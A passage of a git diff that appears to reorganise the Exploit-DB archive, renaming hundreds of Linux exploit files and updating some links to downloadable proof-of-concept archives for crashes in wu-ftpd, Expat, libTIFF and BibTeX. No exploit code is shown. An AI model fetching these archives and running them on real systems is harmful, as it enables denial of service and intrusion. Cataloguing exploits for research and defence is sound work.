a/platforms/lin_x86/dos/38763.txt b/exploits/lin_x86/dos/38763.txt similarity index 97% rename from platforms/lin_x86/dos/38763.txt rename to exploits/lin_x86/dos/38763.txt index 3ccdfd2a9..94d838ed6 100644 --- a/platforms/lin_x86/dos/38763.txt +++ b/exploits/lin_x86/dos/38763.txt @@ -127,4 +127,4 @@ gs 0x63 99 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=, buf_size=, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38763.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38763.zip \ No newline at end of file diff --git a/platforms/lin_x86/dos/39669.txt b/exploits/lin_x86/dos/39669.txt similarity index 100% rename from platforms/lin_x86/dos/39669.txt rename to exploits/lin_x86/dos/39669.txt diff --git a/platforms/lin_x86/local/15916.c b/exploits/lin_x86/local/15916.c similarity index 100% rename from platforms/lin_x86/local/15916.c rename to exploits/lin_x86/local/15916.c diff --git a/platforms/lin_x86/local/26709.txt b/exploits/lin_x86/local/26709.txt similarity index 100% rename from platforms/lin_x86/local/26709.txt rename to exploits/lin_x86/local/26709.txt diff --git a/platforms/lin_x86/local/37724.asm b/exploits/lin_x86/local/37724.asm similarity index 100% rename from platforms/lin_x86/local/37724.asm rename to exploits/lin_x86/local/37724.asm diff --git a/platforms/lin_x86/local/40435.rb b/exploits/lin_x86/local/40435.rb similarity index 100% rename from platforms/lin_x86/local/40435.rb rename to exploits/lin_x86/local/40435.rb diff --git a/platforms/lin_x86/local/42273.c b/exploits/lin_x86/local/42273.c similarity index 100% rename from platforms/lin_x86/local/42273.c rename to exploits/lin_x86/local/42273.c diff --git a/platforms/lin_x86/local/42274.c b/exploits/lin_x86/local/42274.c similarity index 100% rename from platforms/lin_x86/local/42274.c rename to exploits/lin_x86/local/42274.c diff --git a/platforms/lin_x86/local/42276.c b/exploits/lin_x86/local/42276.c similarity index 100% rename from platforms/lin_x86/local/42276.c rename to exploits/lin_x86/local/42276.c diff --git a/platforms/lin_x86/local/9542.c b/exploits/lin_x86/local/9542.c similarity index 100% rename from platforms/lin_x86/local/9542.c rename to exploits/lin_x86/local/9542.c diff --git a/platforms/lin_x86/remote/1291.pl b/exploits/lin_x86/remote/1291.pl similarity index 100% rename from platforms/lin_x86/remote/1291.pl rename to exploits/lin_x86/remote/1291.pl diff --git a/platforms/lin_x86/remote/16860.rb b/exploits/lin_x86/remote/16860.rb similarity index 100% rename from platforms/lin_x86/remote/16860.rb rename to exploits/lin_x86/remote/16860.rb diff --git a/platforms/lin_x86/remote/16861.rb b/exploits/lin_x86/remote/16861.rb similarity index 100% rename from platforms/lin_x86/remote/16861.rb rename to exploits/lin_x86/remote/16861.rb diff --git a/platforms/lin_x86/remote/20032.txt b/exploits/lin_x86/remote/20032.txt similarity index 95% rename from platforms/lin_x86/remote/20032.txt rename to exploits/lin_x86/remote/20032.txt index 73277ef32..eb9537f85 100644 --- a/platforms/lin_x86/remote/20032.txt +++ b/exploits/lin_x86/remote/20032.txt @@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi It should be noted that the SITE INDEX command is affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20032.tar.gz \ No newline at end of file diff --git a/platforms/lin_x86/remote/26737.pl b/exploits/lin_x86/remote/26737.pl similarity index 100% rename from platforms/lin_x86/remote/26737.pl rename to exploits/lin_x86/remote/26737.pl diff --git a/platforms/lin_x86/remote/269.c b/exploits/lin_x86/remote/269.c similarity index 100% rename from platforms/lin_x86/remote/269.c rename to exploits/lin_x86/remote/269.c diff --git a/platforms/lin_x86/remote/3615.c b/exploits/lin_x86/remote/3615.c similarity index 100% rename from platforms/lin_x86/remote/3615.c rename to exploits/lin_x86/remote/3615.c diff --git a/platforms/lin_x86/remote/43030.rb b/exploits/lin_x86/remote/43030.rb similarity index 100% rename from platforms/lin_x86/remote/43030.rb rename to exploits/lin_x86/remote/43030.rb diff --git a/platforms/lin_x86/remote/43031.rb b/exploits/lin_x86/remote/43031.rb similarity index 100% rename from platforms/lin_x86/remote/43031.rb rename to exploits/lin_x86/remote/43031.rb diff --git a/platforms/lin_x86/webapps/34030.txt b/exploits/lin_x86/webapps/34030.txt similarity index 100% rename from platforms/lin_x86/webapps/34030.txt rename to exploits/lin_x86/webapps/34030.txt diff --git a/platforms/linux/dos/10017.c b/exploits/linux/dos/10017.c similarity index 100% rename from platforms/linux/dos/10017.c rename to exploits/linux/dos/10017.c diff --git a/platforms/linux/dos/10022.c b/exploits/linux/dos/10022.c similarity index 100% rename from platforms/linux/dos/10022.c rename to exploits/linux/dos/10022.c diff --git a/platforms/linux/dos/10184.txt b/exploits/linux/dos/10184.txt similarity index 100% rename from platforms/linux/dos/10184.txt rename to exploits/linux/dos/10184.txt diff --git a/platforms/linux/dos/10202.c b/exploits/linux/dos/10202.c similarity index 100% rename from platforms/linux/dos/10202.c rename to exploits/linux/dos/10202.c diff --git a/platforms/linux/dos/10203.txt b/exploits/linux/dos/10203.txt similarity index 92% rename from platforms/linux/dos/10203.txt rename to exploits/linux/dos/10203.txt index 7bc07bae8..3a3f293ca 100644 --- a/platforms/linux/dos/10203.txt +++ b/exploits/linux/dos/10203.txt @@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions. NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file diff --git a/platforms/linux/dos/10206.txt b/exploits/linux/dos/10206.txt similarity index 94% rename from platforms/linux/dos/10206.txt rename to exploits/linux/dos/10206.txt index 0d5a3879b..8f9f034e2 100644 --- a/platforms/linux/dos/10206.txt +++ b/exploits/linux/dos/10206.txt @@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi Expat 2.0.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-1.gz (2009-11-22-36097.gz) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10206-1.gz (2009-11-22-36097.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file diff --git a/platforms/linux/dos/10338.pl b/exploits/linux/dos/10338.pl similarity index 100% rename from platforms/linux/dos/10338.pl rename to exploits/linux/dos/10338.pl diff --git a/platforms/linux/dos/10349.py b/exploits/linux/dos/10349.py similarity index 100% rename from platforms/linux/dos/10349.py rename to exploits/linux/dos/10349.py diff --git a/platforms/linux/dos/10469.py b/exploits/linux/dos/10469.py similarity index 100% rename from platforms/linux/dos/10469.py rename to exploits/linux/dos/10469.py diff --git a/platforms/linux/dos/10617.txt b/exploits/linux/dos/10617.txt similarity index 100% rename from platforms/linux/dos/10617.txt rename to exploits/linux/dos/10617.txt diff --git a/platforms/linux/dos/10634.txt b/exploits/linux/dos/10634.txt similarity index 100% rename from platforms/linux/dos/10634.txt rename to exploits/linux/dos/10634.txt diff --git a/platforms/linux/dos/11.c b/exploits/linux/dos/11.c similarity index 100% rename from platforms/linux/dos/11.c rename to exploits/linux/dos/11.c diff --git a/platforms/linux/dos/11044.txt b/exploits/linux/dos/11044.txt similarity index 100% rename from platforms/linux/dos/11044.txt rename to exploits/linux/dos/11044.txt diff --git a/platforms/linux/dos/115.c b/exploits/linux/dos/115.c similarity index 100% rename from platforms/linux/dos/115.c rename to exploits/linux/dos/115.c diff --git a/platforms/linux/dos/11736.py b/exploits/linux/dos/11736.py similarity index 100% rename from platforms/linux/dos/11736.py rename to exploits/linux/dos/11736.py diff --git a/platforms/linux/dos/11770.txt b/exploits/linux/dos/11770.txt similarity index 100% rename from platforms/linux/dos/11770.txt rename to exploits/linux/dos/11770.txt diff --git a/platforms/linux/dos/11893.pl b/exploits/linux/dos/11893.pl similarity index 100% rename from platforms/linux/dos/11893.pl rename to exploits/linux/dos/11893.pl diff --git a/platforms/linux/dos/11932.txt b/exploits/linux/dos/11932.txt similarity index 100% rename from platforms/linux/dos/11932.txt rename to exploits/linux/dos/11932.txt diff --git a/platforms/linux/dos/1196.c b/exploits/linux/dos/1196.c similarity index 100% rename from platforms/linux/dos/1196.c rename to exploits/linux/dos/1196.c diff --git a/platforms/linux/dos/12095.txt b/exploits/linux/dos/12095.txt similarity index 100% rename from platforms/linux/dos/12095.txt rename to exploits/linux/dos/12095.txt diff --git a/platforms/linux/dos/12334.c b/exploits/linux/dos/12334.c similarity index 100% rename from platforms/linux/dos/12334.c rename to exploits/linux/dos/12334.c diff --git a/platforms/linux/dos/12588.txt b/exploits/linux/dos/12588.txt similarity index 100% rename from platforms/linux/dos/12588.txt rename to exploits/linux/dos/12588.txt diff --git a/platforms/linux/dos/14083.pl b/exploits/linux/dos/14083.pl similarity index 100% rename from platforms/linux/dos/14083.pl rename to exploits/linux/dos/14083.pl diff --git a/platforms/linux/dos/14452.txt b/exploits/linux/dos/14452.txt similarity index 100% rename from platforms/linux/dos/14452.txt rename to exploits/linux/dos/14452.txt diff --git a/platforms/linux/dos/14573.txt b/exploits/linux/dos/14573.txt similarity index 88% rename from platforms/linux/dos/14573.txt rename to exploits/linux/dos/14573.txt index ecb434adc..0b708a908 100644 --- a/platforms/linux/dos/14573.txt +++ b/exploits/linux/dos/14573.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera Versions up to and including libTIFF 3.9.4 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file diff --git a/platforms/linux/dos/14594.py b/exploits/linux/dos/14594.py similarity index 100% rename from platforms/linux/dos/14594.py rename to exploits/linux/dos/14594.py diff --git a/platforms/linux/dos/14904.txt b/exploits/linux/dos/14904.txt similarity index 100% rename from platforms/linux/dos/14904.txt rename to exploits/linux/dos/14904.txt diff --git a/platforms/linux/dos/15054.rb b/exploits/linux/dos/15054.rb similarity index 100% rename from platforms/linux/dos/15054.rb rename to exploits/linux/dos/15054.rb diff --git a/platforms/linux/dos/15062.txt b/exploits/linux/dos/15062.txt similarity index 100% rename from platforms/linux/dos/15062.txt rename to exploits/linux/dos/15062.txt diff --git a/platforms/linux/dos/15293.txt b/exploits/linux/dos/15293.txt similarity index 100% rename from platforms/linux/dos/15293.txt rename to exploits/linux/dos/15293.txt diff --git a/platforms/linux/dos/15463.txt b/exploits/linux/dos/15463.txt similarity index 100% rename from platforms/linux/dos/15463.txt rename to exploits/linux/dos/15463.txt diff --git a/platforms/linux/dos/15464.txt b/exploits/linux/dos/15464.txt similarity index 100% rename from platforms/linux/dos/15464.txt rename to exploits/linux/dos/15464.txt diff --git a/platforms/linux/dos/15619.c b/exploits/linux/dos/15619.c similarity index 100% rename from platforms/linux/dos/15619.c rename to exploits/linux/dos/15619.c diff --git a/platforms/linux/dos/15622.c b/exploits/linux/dos/15622.c similarity index 100% rename from platforms/linux/dos/15622.c rename to exploits/linux/dos/15622.c diff --git a/platforms/linux/dos/15705.txt b/exploits/linux/dos/15705.txt similarity index 100% rename from platforms/linux/dos/15705.txt rename to exploits/linux/dos/15705.txt diff --git a/platforms/linux/dos/15732.txt b/exploits/linux/dos/15732.txt similarity index 100% rename from platforms/linux/dos/15732.txt rename to exploits/linux/dos/15732.txt diff --git a/platforms/linux/dos/15935.c b/exploits/linux/dos/15935.c similarity index 100% rename from platforms/linux/dos/15935.c rename to exploits/linux/dos/15935.c diff --git a/platforms/linux/dos/15974.txt b/exploits/linux/dos/15974.txt similarity index 100% rename from platforms/linux/dos/15974.txt rename to exploits/linux/dos/15974.txt diff --git a/platforms/linux/dos/16095.pl b/exploits/linux/dos/16095.pl similarity index 100% rename from platforms/linux/dos/16095.pl rename to exploits/linux/dos/16095.pl diff --git a/platforms/linux/dos/16129.txt b/exploits/linux/dos/16129.txt similarity index 100% rename from platforms/linux/dos/16129.txt rename to exploits/linux/dos/16129.txt diff --git a/platforms/linux/dos/16182.txt b/exploits/linux/dos/16182.txt similarity index 100% rename from platforms/linux/dos/16182.txt rename to exploits/linux/dos/16182.txt diff --git a/platforms/linux/dos/16192.pl b/exploits/linux/dos/16192.pl similarity index 100% rename from platforms/linux/dos/16192.pl rename to exploits/linux/dos/16192.pl diff --git a/platforms/linux/dos/16216.txt b/exploits/linux/dos/16216.txt similarity index 100% rename from platforms/linux/dos/16216.txt rename to exploits/linux/dos/16216.txt diff --git a/platforms/linux/dos/16263.c b/exploits/linux/dos/16263.c similarity index 100% rename from platforms/linux/dos/16263.c rename to exploits/linux/dos/16263.c diff --git a/platforms/linux/dos/16270.c b/exploits/linux/dos/16270.c similarity index 100% rename from platforms/linux/dos/16270.c rename to exploits/linux/dos/16270.c diff --git a/platforms/linux/dos/1634.pl b/exploits/linux/dos/1634.pl similarity index 100% rename from platforms/linux/dos/1634.pl rename to exploits/linux/dos/1634.pl diff --git a/platforms/linux/dos/1641.pl b/exploits/linux/dos/1641.pl similarity index 100% rename from platforms/linux/dos/1641.pl rename to exploits/linux/dos/1641.pl diff --git a/platforms/linux/dos/1657.asm b/exploits/linux/dos/1657.asm similarity index 100% rename from platforms/linux/dos/1657.asm rename to exploits/linux/dos/1657.asm diff --git a/platforms/linux/dos/16952.c b/exploits/linux/dos/16952.c similarity index 100% rename from platforms/linux/dos/16952.c rename to exploits/linux/dos/16952.c diff --git a/platforms/linux/dos/16960.txt b/exploits/linux/dos/16960.txt similarity index 100% rename from platforms/linux/dos/16960.txt rename to exploits/linux/dos/16960.txt diff --git a/platforms/linux/dos/16966.php b/exploits/linux/dos/16966.php similarity index 100% rename from platforms/linux/dos/16966.php rename to exploits/linux/dos/16966.php diff --git a/platforms/linux/dos/16973.c b/exploits/linux/dos/16973.c similarity index 100% rename from platforms/linux/dos/16973.c rename to exploits/linux/dos/16973.c diff --git a/platforms/linux/dos/17004.txt b/exploits/linux/dos/17004.txt similarity index 100% rename from platforms/linux/dos/17004.txt rename to exploits/linux/dos/17004.txt diff --git a/platforms/linux/dos/17222.c b/exploits/linux/dos/17222.c similarity index 100% rename from platforms/linux/dos/17222.c rename to exploits/linux/dos/17222.c diff --git a/platforms/linux/dos/17400.c b/exploits/linux/dos/17400.c similarity index 100% rename from platforms/linux/dos/17400.c rename to exploits/linux/dos/17400.c diff --git a/platforms/linux/dos/1746.pl b/exploits/linux/dos/1746.pl similarity index 100% rename from platforms/linux/dos/1746.pl rename to exploits/linux/dos/1746.pl diff --git a/platforms/linux/dos/17463.pl b/exploits/linux/dos/17463.pl similarity index 100% rename from platforms/linux/dos/17463.pl rename to exploits/linux/dos/17463.pl diff --git a/platforms/linux/dos/17769.c b/exploits/linux/dos/17769.c similarity index 100% rename from platforms/linux/dos/17769.c rename to exploits/linux/dos/17769.c diff --git a/platforms/linux/dos/17806.txt b/exploits/linux/dos/17806.txt similarity index 100% rename from platforms/linux/dos/17806.txt rename to exploits/linux/dos/17806.txt diff --git a/platforms/linux/dos/18120.py b/exploits/linux/dos/18120.py similarity index 100% rename from platforms/linux/dos/18120.py rename to exploits/linux/dos/18120.py diff --git a/platforms/linux/dos/1815.c b/exploits/linux/dos/1815.c similarity index 100% rename from platforms/linux/dos/1815.c rename to exploits/linux/dos/1815.c diff --git a/platforms/linux/dos/18159.py b/exploits/linux/dos/18159.py similarity index 100% rename from platforms/linux/dos/18159.py rename to exploits/linux/dos/18159.py diff --git a/platforms/linux/dos/18221.c b/exploits/linux/dos/18221.c similarity index 100% rename from platforms/linux/dos/18221.c rename to exploits/linux/dos/18221.c diff --git a/platforms/linux/dos/18225.c b/exploits/linux/dos/18225.c similarity index 100% rename from platforms/linux/dos/18225.c rename to exploits/linux/dos/18225.c diff --git a/platforms/linux/dos/18278.txt b/exploits/linux/dos/18278.txt similarity index 100% rename from platforms/linux/dos/18278.txt rename to exploits/linux/dos/18278.txt diff --git a/platforms/linux/dos/18295.txt b/exploits/linux/dos/18295.txt similarity index 94% rename from platforms/linux/dos/18295.txt rename to exploits/linux/dos/18295.txt index f98d9d1aa..cbb7759b3 100644 --- a/platforms/linux/dos/18295.txt +++ b/exploits/linux/dos/18295.txt @@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki -- http://pi3.com.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18295.c (p_cve-2011-4362.c) http://blog.pi3.com.pl/?p=277 \ No newline at end of file diff --git a/platforms/linux/dos/18378.c b/exploits/linux/dos/18378.c similarity index 100% rename from platforms/linux/dos/18378.c rename to exploits/linux/dos/18378.c diff --git a/platforms/linux/dos/18436.txt b/exploits/linux/dos/18436.txt similarity index 100% rename from platforms/linux/dos/18436.txt rename to exploits/linux/dos/18436.txt diff --git a/platforms/linux/dos/18457.py b/exploits/linux/dos/18457.py similarity index 100% rename from platforms/linux/dos/18457.py rename to exploits/linux/dos/18457.py diff --git a/platforms/linux/dos/185.sh b/exploits/linux/dos/185.sh similarity index 100% rename from platforms/linux/dos/185.sh rename to exploits/linux/dos/185.sh diff --git a/platforms/linux/dos/1852.c b/exploits/linux/dos/1852.c similarity index 100% rename from platforms/linux/dos/1852.c rename to exploits/linux/dos/1852.c diff --git a/platforms/linux/dos/18579.txt b/exploits/linux/dos/18579.txt similarity index 100% rename from platforms/linux/dos/18579.txt rename to exploits/linux/dos/18579.txt diff --git a/platforms/linux/dos/18692.rb b/exploits/linux/dos/18692.rb similarity index 100% rename from platforms/linux/dos/18692.rb rename to exploits/linux/dos/18692.rb diff --git a/platforms/linux/dos/1880.c b/exploits/linux/dos/1880.c similarity index 100% rename from platforms/linux/dos/1880.c rename to exploits/linux/dos/1880.c diff --git a/platforms/linux/dos/18855.txt b/exploits/linux/dos/18855.txt similarity index 100% rename from platforms/linux/dos/18855.txt rename to exploits/linux/dos/18855.txt diff --git a/platforms/linux/dos/1894.py b/exploits/linux/dos/1894.py similarity index 100% rename from platforms/linux/dos/1894.py rename to exploits/linux/dos/1894.py diff --git a/platforms/linux/dos/19075.c b/exploits/linux/dos/19075.c similarity index 100% rename from platforms/linux/dos/19075.c rename to exploits/linux/dos/19075.c diff --git a/platforms/linux/dos/19076.txt b/exploits/linux/dos/19076.txt similarity index 100% rename from platforms/linux/dos/19076.txt rename to exploits/linux/dos/19076.txt diff --git a/platforms/linux/dos/19082.txt b/exploits/linux/dos/19082.txt similarity index 100% rename from platforms/linux/dos/19082.txt rename to exploits/linux/dos/19082.txt diff --git a/platforms/linux/dos/19085.c b/exploits/linux/dos/19085.c similarity index 100% rename from platforms/linux/dos/19085.c rename to exploits/linux/dos/19085.c diff --git a/platforms/linux/dos/19103.c b/exploits/linux/dos/19103.c similarity index 100% rename from platforms/linux/dos/19103.c rename to exploits/linux/dos/19103.c diff --git a/platforms/linux/dos/19241.c b/exploits/linux/dos/19241.c similarity index 100% rename from platforms/linux/dos/19241.c rename to exploits/linux/dos/19241.c diff --git a/platforms/linux/dos/19250.txt b/exploits/linux/dos/19250.txt similarity index 100% rename from platforms/linux/dos/19250.txt rename to exploits/linux/dos/19250.txt diff --git a/platforms/linux/dos/19271.c b/exploits/linux/dos/19271.c similarity index 100% rename from platforms/linux/dos/19271.c rename to exploits/linux/dos/19271.c diff --git a/platforms/linux/dos/19272.txt b/exploits/linux/dos/19272.txt similarity index 100% rename from platforms/linux/dos/19272.txt rename to exploits/linux/dos/19272.txt diff --git a/platforms/linux/dos/19282.c b/exploits/linux/dos/19282.c similarity index 100% rename from platforms/linux/dos/19282.c rename to exploits/linux/dos/19282.c diff --git a/platforms/linux/dos/19301.c b/exploits/linux/dos/19301.c similarity index 100% rename from platforms/linux/dos/19301.c rename to exploits/linux/dos/19301.c diff --git a/platforms/linux/dos/19308.c b/exploits/linux/dos/19308.c similarity index 100% rename from platforms/linux/dos/19308.c rename to exploits/linux/dos/19308.c diff --git a/platforms/linux/dos/19463.c b/exploits/linux/dos/19463.c similarity index 100% rename from platforms/linux/dos/19463.c rename to exploits/linux/dos/19463.c diff --git a/platforms/linux/dos/19605.c b/exploits/linux/dos/19605.c similarity index 100% rename from platforms/linux/dos/19605.c rename to exploits/linux/dos/19605.c diff --git a/platforms/linux/dos/19675.c b/exploits/linux/dos/19675.c similarity index 100% rename from platforms/linux/dos/19675.c rename to exploits/linux/dos/19675.c diff --git a/platforms/linux/dos/19701.sh b/exploits/linux/dos/19701.sh similarity index 100% rename from platforms/linux/dos/19701.sh rename to exploits/linux/dos/19701.sh diff --git a/platforms/linux/dos/19818.c b/exploits/linux/dos/19818.c similarity index 100% rename from platforms/linux/dos/19818.c rename to exploits/linux/dos/19818.c diff --git a/platforms/linux/dos/19850.c b/exploits/linux/dos/19850.c similarity index 100% rename from platforms/linux/dos/19850.c rename to exploits/linux/dos/19850.c diff --git a/platforms/linux/dos/19869.txt b/exploits/linux/dos/19869.txt similarity index 100% rename from platforms/linux/dos/19869.txt rename to exploits/linux/dos/19869.txt diff --git a/platforms/linux/dos/19870.pl b/exploits/linux/dos/19870.pl similarity index 100% rename from platforms/linux/dos/19870.pl rename to exploits/linux/dos/19870.pl diff --git a/platforms/linux/dos/19950.c b/exploits/linux/dos/19950.c similarity index 100% rename from platforms/linux/dos/19950.c rename to exploits/linux/dos/19950.c diff --git a/platforms/linux/dos/19987.py b/exploits/linux/dos/19987.py similarity index 100% rename from platforms/linux/dos/19987.py rename to exploits/linux/dos/19987.py diff --git a/platforms/linux/dos/20023.c b/exploits/linux/dos/20023.c similarity index 100% rename from platforms/linux/dos/20023.c rename to exploits/linux/dos/20023.c diff --git a/platforms/linux/dos/20025.txt b/exploits/linux/dos/20025.txt similarity index 100% rename from platforms/linux/dos/20025.txt rename to exploits/linux/dos/20025.txt diff --git a/platforms/linux/dos/20026.c b/exploits/linux/dos/20026.c similarity index 100% rename from platforms/linux/dos/20026.c rename to exploits/linux/dos/20026.c diff --git a/platforms/linux/dos/20167.txt b/exploits/linux/dos/20167.txt similarity index 100% rename from platforms/linux/dos/20167.txt rename to exploits/linux/dos/20167.txt diff --git a/platforms/linux/dos/20217.txt b/exploits/linux/dos/20217.txt similarity index 100% rename from platforms/linux/dos/20217.txt rename to exploits/linux/dos/20217.txt diff --git a/platforms/linux/dos/20388.txt b/exploits/linux/dos/20388.txt similarity index 100% rename from platforms/linux/dos/20388.txt rename to exploits/linux/dos/20388.txt diff --git a/platforms/linux/dos/20479.pl b/exploits/linux/dos/20479.pl similarity index 100% rename from platforms/linux/dos/20479.pl rename to exploits/linux/dos/20479.pl diff --git a/platforms/linux/dos/20494.pl b/exploits/linux/dos/20494.pl similarity index 100% rename from platforms/linux/dos/20494.pl rename to exploits/linux/dos/20494.pl diff --git a/platforms/linux/dos/2051.py b/exploits/linux/dos/2051.py similarity index 100% rename from platforms/linux/dos/2051.py rename to exploits/linux/dos/2051.py diff --git a/platforms/linux/dos/20535.txt b/exploits/linux/dos/20535.txt similarity index 100% rename from platforms/linux/dos/20535.txt rename to exploits/linux/dos/20535.txt diff --git a/platforms/linux/dos/20536.java b/exploits/linux/dos/20536.java similarity index 100% rename from platforms/linux/dos/20536.java rename to exploits/linux/dos/20536.java diff --git a/platforms/linux/dos/20561.pl b/exploits/linux/dos/20561.pl similarity index 100% rename from platforms/linux/dos/20561.pl rename to exploits/linux/dos/20561.pl diff --git a/platforms/linux/dos/20562.c b/exploits/linux/dos/20562.c similarity index 100% rename from platforms/linux/dos/20562.c rename to exploits/linux/dos/20562.c diff --git a/platforms/linux/dos/20566.c b/exploits/linux/dos/20566.c similarity index 100% rename from platforms/linux/dos/20566.c rename to exploits/linux/dos/20566.c diff --git a/platforms/linux/dos/20747.txt b/exploits/linux/dos/20747.txt similarity index 100% rename from platforms/linux/dos/20747.txt rename to exploits/linux/dos/20747.txt diff --git a/platforms/linux/dos/20750.txt b/exploits/linux/dos/20750.txt similarity index 100% rename from platforms/linux/dos/20750.txt rename to exploits/linux/dos/20750.txt diff --git a/platforms/linux/dos/20952.c b/exploits/linux/dos/20952.c similarity index 100% rename from platforms/linux/dos/20952.c rename to exploits/linux/dos/20952.c diff --git a/platforms/linux/dos/21122.sh b/exploits/linux/dos/21122.sh similarity index 100% rename from platforms/linux/dos/21122.sh rename to exploits/linux/dos/21122.sh diff --git a/platforms/linux/dos/21141.txt b/exploits/linux/dos/21141.txt similarity index 100% rename from platforms/linux/dos/21141.txt rename to exploits/linux/dos/21141.txt diff --git a/platforms/linux/dos/21202.txt b/exploits/linux/dos/21202.txt similarity index 100% rename from platforms/linux/dos/21202.txt rename to exploits/linux/dos/21202.txt diff --git a/platforms/linux/dos/21262.txt b/exploits/linux/dos/21262.txt similarity index 100% rename from platforms/linux/dos/21262.txt rename to exploits/linux/dos/21262.txt diff --git a/platforms/linux/dos/21338.pl b/exploits/linux/dos/21338.pl similarity index 100% rename from platforms/linux/dos/21338.pl rename to exploits/linux/dos/21338.pl diff --git a/platforms/linux/dos/21476.c b/exploits/linux/dos/21476.c similarity index 100% rename from platforms/linux/dos/21476.c rename to exploits/linux/dos/21476.c diff --git a/platforms/linux/dos/21477.c b/exploits/linux/dos/21477.c similarity index 100% rename from platforms/linux/dos/21477.c rename to exploits/linux/dos/21477.c diff --git a/platforms/linux/dos/21482.txt b/exploits/linux/dos/21482.txt similarity index 100% rename from platforms/linux/dos/21482.txt rename to exploits/linux/dos/21482.txt diff --git a/platforms/linux/dos/21518.txt b/exploits/linux/dos/21518.txt similarity index 100% rename from platforms/linux/dos/21518.txt rename to exploits/linux/dos/21518.txt diff --git a/platforms/linux/dos/21534.jsp b/exploits/linux/dos/21534.jsp similarity index 100% rename from platforms/linux/dos/21534.jsp rename to exploits/linux/dos/21534.jsp diff --git a/platforms/linux/dos/21537.c b/exploits/linux/dos/21537.c similarity index 100% rename from platforms/linux/dos/21537.c rename to exploits/linux/dos/21537.c diff --git a/platforms/linux/dos/21580.txt b/exploits/linux/dos/21580.txt similarity index 100% rename from platforms/linux/dos/21580.txt rename to exploits/linux/dos/21580.txt diff --git a/platforms/linux/dos/21598.c b/exploits/linux/dos/21598.c similarity index 100% rename from platforms/linux/dos/21598.c rename to exploits/linux/dos/21598.c diff --git a/platforms/linux/dos/21775.c b/exploits/linux/dos/21775.c similarity index 100% rename from platforms/linux/dos/21775.c rename to exploits/linux/dos/21775.c diff --git a/platforms/linux/dos/21854.c b/exploits/linux/dos/21854.c similarity index 100% rename from platforms/linux/dos/21854.c rename to exploits/linux/dos/21854.c diff --git a/platforms/linux/dos/21985.txt b/exploits/linux/dos/21985.txt similarity index 100% rename from platforms/linux/dos/21985.txt rename to exploits/linux/dos/21985.txt diff --git a/platforms/linux/dos/22011.c b/exploits/linux/dos/22011.c similarity index 100% rename from platforms/linux/dos/22011.c rename to exploits/linux/dos/22011.c diff --git a/platforms/linux/dos/22033.txt b/exploits/linux/dos/22033.txt similarity index 100% rename from platforms/linux/dos/22033.txt rename to exploits/linux/dos/22033.txt diff --git a/platforms/linux/dos/22056.txt b/exploits/linux/dos/22056.txt similarity index 100% rename from platforms/linux/dos/22056.txt rename to exploits/linux/dos/22056.txt diff --git a/platforms/linux/dos/22059.pl b/exploits/linux/dos/22059.pl similarity index 100% rename from platforms/linux/dos/22059.pl rename to exploits/linux/dos/22059.pl diff --git a/platforms/linux/dos/22061.txt b/exploits/linux/dos/22061.txt similarity index 100% rename from platforms/linux/dos/22061.txt rename to exploits/linux/dos/22061.txt diff --git a/platforms/linux/dos/22079.sh b/exploits/linux/dos/22079.sh similarity index 100% rename from platforms/linux/dos/22079.sh rename to exploits/linux/dos/22079.sh diff --git a/platforms/linux/dos/22105.c b/exploits/linux/dos/22105.c similarity index 100% rename from platforms/linux/dos/22105.c rename to exploits/linux/dos/22105.c diff --git a/platforms/linux/dos/22183.c b/exploits/linux/dos/22183.c similarity index 100% rename from platforms/linux/dos/22183.c rename to exploits/linux/dos/22183.c diff --git a/platforms/linux/dos/22191.pl b/exploits/linux/dos/22191.pl similarity index 100% rename from platforms/linux/dos/22191.pl rename to exploits/linux/dos/22191.pl diff --git a/platforms/linux/dos/22197.txt b/exploits/linux/dos/22197.txt similarity index 100% rename from platforms/linux/dos/22197.txt rename to exploits/linux/dos/22197.txt diff --git a/platforms/linux/dos/22243.txt b/exploits/linux/dos/22243.txt similarity index 100% rename from platforms/linux/dos/22243.txt rename to exploits/linux/dos/22243.txt diff --git a/platforms/linux/dos/22259.c b/exploits/linux/dos/22259.c similarity index 100% rename from platforms/linux/dos/22259.c rename to exploits/linux/dos/22259.c diff --git a/platforms/linux/dos/22273.c b/exploits/linux/dos/22273.c similarity index 100% rename from platforms/linux/dos/22273.c rename to exploits/linux/dos/22273.c diff --git a/platforms/linux/dos/22294.c b/exploits/linux/dos/22294.c similarity index 100% rename from platforms/linux/dos/22294.c rename to 